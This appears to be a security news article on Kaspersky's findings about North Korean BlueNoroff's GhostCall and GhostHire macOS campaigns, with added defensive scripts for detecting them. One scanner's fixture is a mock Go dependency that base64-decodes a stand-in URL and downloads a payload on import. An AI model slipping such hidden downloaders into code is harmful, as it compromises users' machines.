The North Korean APT group BlueNoroff — also known as Sapphire Sleet, APT38, Alluring Pisces, Stardust Chollima, and TA444 — has launched two intertwined cyber-espionage and financial-theft campaigns under its long-running SnatchCrypto operation. According to a new report from Kaspersky, the campaigns, dubbed GhostCall and GhostHire, demonstrate the actor’s escalating sophistication, shifting fully to macOS and integrating AI-generated content to enhance social-engineering realism.
The GhostCall operation targets blockchain executives and venture-capital leaders by inviting them to join seemingly legitimate Zoom or Microsoft Teams meetings. Kaspersky explains that “the GhostCall campaign is a sophisticated attack that uses fake online calls with the threat actors posing as fake entrepreneurs or investors to convince targets.” Once a victim joins, prerecorded videos of previous victims are played to create the illusion of a live discussion, while a fraudulent prompt urges the participant to “update the Zoom SDK.”
That “update” is a malicious AppleScript that downloads further payloads. Kaspersky’s researchers describe how “the actor reaches out to targets on Telegram by impersonating venture capitalists and, in some cases, using compromised accounts of real entrepreneurs and startup founders.” The fake sites replicate Zoom’s interface with near-pixel accuracy, including live camera and name prompts to maintain authenticity.

The campaign has gradually migrated from Zoom to Microsoft Teams, signaling adaptability to corporate trends and suggesting the attackers’ deep understanding of business collaboration tools.
Kaspersky’s analysis reveals an intricate web of multi-stage infection chains, each modularly constructed to evade detection. The firm identified at least seven distinct sequences — including DownTroy, CosmicDoor, RooTroy, SneakMain, and RealTimeTroy — along with a keylogger and a stealer suite named SilentSiphon.
The SilentSiphon suite is described as “a collection of Bash shell scripts used to collect and exfiltrate data to the actor’s C2 servers.” It targets credentials, API keys, cryptocurrency wallets, DevOps configurations, and even OpenAI API tokens, effectively granting the attackers potential access to both personal and enterprise infrastructure.
Notably, BlueNoroff’s engineers have transitioned from Rust to Nim, employing C++, Go, Swift, and Python to diversify their malware base. This “language agility” complicates attribution and hampers antivirus detection, underscoring the group’s resource depth.
While the GhostCall operation relies on prerecorded videos instead of deepfakes, Kaspersky uncovered that BlueNoroff enhances stolen or scraped profile images using GPT-4o. The report states, “Some of these images were enhanced with GPT-4o. Since OpenAI implemented the C2PA standard specification metadata to identify the generated images as artificial, the images created via ChatGPT include metadata that indicates their synthetic origin.”
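A defender can turn the C2PA detail above into a check on the profile images used in outreach. The following is an added example, not code from Kaspersky's report: it walks PNG chunks and JPEG marker segments looking for the caBX chunk and APP11 JUMBF box that C2PA manifests use, and the three sample images are constructed inline.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
JPEG_SOI = b"\xff\xd8"

def png_chunks(data):
    """Yield (type, payload) for each chunk of a PNG byte string."""
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        yield ctype, data[pos + 8:pos + 8 + length]
        pos += 12 + length  # 4 length + 4 type + payload + 4 CRC

def jpeg_segments(data):
    """Yield (marker, payload) for JPEG marker segments before the scan data."""
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker == 0xDA:  # SOS: entropy-coded image data follows, stop here
            break
        seglen = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        yield marker, data[pos + 4:pos + 2 + seglen]
        pos += 2 + seglen

def has_c2pa_manifest(data):
    """True if the image embeds a C2PA manifest (caBX chunk in PNG, APP11 JUMBF in JPEG)."""
    if data.startswith(PNG_SIG):
        return any(ctype == b"caBX" for ctype, _ in png_chunks(data))
    if data.startswith(JPEG_SOI):
        # Heuristic: C2PA JUMBF boxes inside APP11 (0xEB) segments carry the "c2pa" label.
        return any(m == 0xEB and b"c2pa" in p for m, p in jpeg_segments(data))
    return False

def _png_chunk(ctype, payload):
    body = ctype + payload
    return struct.pack(">I", len(payload)) + body + struct.pack(">I", zlib.crc32(body))

# Constructed samples: a plain PNG, a PNG carrying a caBX chunk, a JPEG carrying an APP11 JUMBF box.
SAMPLE_PNG_PLAIN = PNG_SIG + _png_chunk(b"IHDR", b"\x00" * 13) + _png_chunk(b"IEND", b"")
SAMPLE_PNG_C2PA = (PNG_SIG + _png_chunk(b"IHDR", b"\x00" * 13)
                   + _png_chunk(b"caBX", b"\x00\x00\x00\x20jumbc2pa\x00") + _png_chunk(b"IEND", b""))
_app11 = b"JP\x00\x01\x00\x01" + b"\x00\x00\x00\x20jumbc2pa\x00"
SAMPLE_JPEG_C2PA = JPEG_SOI + b"\xff\xeb" + struct.pack(">H", len(_app11) + 2) + _app11 + b"\xff\xd9"

if __name__ == "__main__":
    for name, img in [("plain png", SAMPLE_PNG_PLAIN), ("c2pa png", SAMPLE_PNG_C2PA), ("c2pa jpeg", SAMPLE_JPEG_C2PA)]:
        print(name, has_c2pa_manifest(img))
```

A hit is a strong signal that the picture came out of an AI tool; a miss proves nothing, since re-encoding or screenshotting strips the manifest.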
This hybrid use of real footage and AI-polished visuals blurs authenticity lines, making the attacks nearly indistinguishable from legitimate investor interactions. The group also appears to employ AI-written code snippets within malware modules — a rare glimpse into automated offensive scripting. Kaspersky observed that “the secrets stealer module includes several comment lines, one of them using a checkmark emoticon — suggesting BlueNoroff uses generative AI to write malicious scripts.”
The GhostHire campaign parallels GhostCall’s tactics but masquerades as recruitment outreach. Developers and engineers receive Telegram messages from “recruiters” posing as representatives of major fintech firms. Victims are sent a coding challenge via Telegram bot or GitHub repository and pressured to finish within 30 minutes — a psychological trick that boosts infection success.
The malicious Go project imports a fake dependency named uniroute, which decodes a base64-encoded URL and downloads OS-specific payloads. On macOS, these payloads again deploy DownTroy, connecting both campaigns into a cohesive ecosystem.
Kaspersky notes that “the project delivered through the ZIP file appears to be a legitimate DeFi-related project written in Go, aiming at routing cryptocurrency transactions across various protocols,” but the hidden dependency injects the malware into the target’s system.
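One review a developer or security team can run on a "coding challenge" before building it is to look for the trick attributed to the uniroute dependency: a string literal that only becomes a URL after base64 decoding. This is an added example, not Kaspersky's code or the malicious project's; the sample Go file is constructed here and only borrows the package name from the report.

```python
import base64
import re
from pathlib import Path
from urllib.parse import urlparse

# Go interpreted ("...") and raw (`...`) string literals.
GO_STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"|`([^`]*)`')
# Candidate literals: base64 alphabet (standard or URL-safe) and long enough to hold a URL.
B64_RE = re.compile(r"^[A-Za-z0-9+/_=-]{12,}$")

def decoded_urls(source):
    """Return (host, url) for every base64 literal in one Go file that decodes to an http(s) URL."""
    hits = []
    for m in GO_STRING_RE.finditer(source):
        literal = m.group(1) or m.group(2) or ""
        if not B64_RE.match(literal):
            continue
        norm = literal.translate(str.maketrans("-_", "+/"))
        norm += "=" * (-len(norm) % 4)  # tolerate stripped padding
        try:
            text = base64.b64decode(norm, validate=True).decode("utf-8").strip()
            parsed = urlparse(text)
        except ValueError:  # binascii.Error, UnicodeDecodeError and urlparse errors all derive from it
            continue
        if parsed.scheme in ("http", "https") and parsed.netloc:
            hits.append((parsed.netloc, text))
    return hits

def scan_tree(root):
    """Map each .go file under root (vendored dependencies included) to the hidden URLs it contains."""
    findings = {}
    for path in Path(root).rglob("*.go"):
        urls = decoded_urls(path.read_text(errors="replace"))
        if urls:
            findings[str(path)] = urls
    return findings

# Constructed sample modelled on the behaviour the report describes for the uniroute dependency.
SAMPLE_GO = '''package uniroute

import (
    "encoding/base64"
    "net/http"
    "runtime"
)

// Looks like routing configuration but decodes to https://example.invalid/payload (constructed).
var route = "aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvcGF5bG9hZA=="

func init() {
    u, _ := base64.StdEncoding.DecodeString(route)
    _, _ = http.Get(string(u) + "/" + runtime.GOOS) // OS-specific download on import
}
'''

if __name__ == "__main__":
    for host, url in decoded_urls(SAMPLE_GO):
        print("hidden URL to", host, "->", url)
```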

Among the discovered chains, DownTroy stands out as the main downloader and persistence enabler. By abusing macOS’s Transparency, Consent, and Control (TCC) framework, it can silently grant automation and file-access permissions without user consent. Other modules like ZoomClutch mimic legitimate applications, prompt for system passwords, and exfiltrate them to C2 servers.
Kaspersky confirms that “ZoomClutch steals macOS passwords by displaying a fake Zoom dialog, then sends the captured credentials to the C2 server.”
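The TCC abuse attributed to DownTroy leaves a trace a defender can audit: automation and Full Disk Access grants to clients nobody approved. The following is an added example, not from the report; it uses an in-memory SQLite stand-in for TCC.db with a subset of the access table's columns (service, client, client_type, auth_value, auth_reason, last_modified), and every row is constructed.

```python
import sqlite3
from datetime import datetime, timezone

# Services whose silent grant would give an implant AppleScript automation or broad file access.
SENSITIVE_SERVICES = {
    "kTCCServiceAppleEvents",           # automation of other apps (AppleScript)
    "kTCCServiceSystemPolicyAllFiles",  # Full Disk Access
    "kTCCServiceAccessibility",
}
ALLOWED = 2  # TCC.db auth_value meaning "allowed"

def _now():
    return int(datetime.now(timezone.utc).timestamp())

def open_sample_db():
    """Constructed stand-in for ~/Library/Application Support/com.apple.TCC/TCC.db."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER,
                    auth_value INTEGER, auth_reason INTEGER, last_modified INTEGER)""")
    now = _now()
    conn.executemany("INSERT INTO access VALUES (?,?,?,?,?,?)", [
        # client_type 0 = bundle identifier, 1 = absolute path
        ("kTCCServiceAppleEvents", "com.apple.Terminal", 0, ALLOWED, 2, now - 86400 * 30),
        ("kTCCServiceSystemPolicyAllFiles", "/usr/local/bin/updater", 1, ALLOWED, 3, now - 60),
        ("kTCCServiceAppleEvents", "/Users/alice/Library/Caches/zoom_sdk.app", 1, ALLOWED, 3, now - 120),
        ("kTCCServiceCamera", "us.zoom.xos", 0, ALLOWED, 2, now - 86400),
    ])
    return conn

def suspicious_grants(conn, allowlist, max_age_seconds=None):
    """Sensitive grants to clients outside the allowlist, newest first; optionally only recent ones."""
    rows = conn.execute(
        "SELECT service, client, client_type, auth_reason, last_modified FROM access "
        "WHERE auth_value = ? ORDER BY last_modified DESC", (ALLOWED,)).fetchall()
    now = _now()
    return [r for r in rows
            if r[0] in SENSITIVE_SERVICES and r[1] not in allowlist
            and (max_age_seconds is None or now - r[4] <= max_age_seconds)]

if __name__ == "__main__":
    db = open_sample_db()
    for service, client, ctype, reason, ts in suspicious_grants(db, {"com.apple.Terminal"}):
        print(f"{service}: {client} (type {ctype}, reason {reason}, at {ts})")
```

On a real host the user database is itself behind Full Disk Access, so run the query from an EDR or a privileged maintenance context over a copy of the file.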
Once known for cryptocurrency theft, BlueNoroff now operates with the precision of an AI-driven cyber-espionage unit, merging social engineering, cross-platform development, and artificial intelligence.
Kaspersky concludes its analysis with a warning: “We observed the actor utilizing AI in various aspects of their attacks, which enabled them to enhance productivity and meticulously refine their attacks.”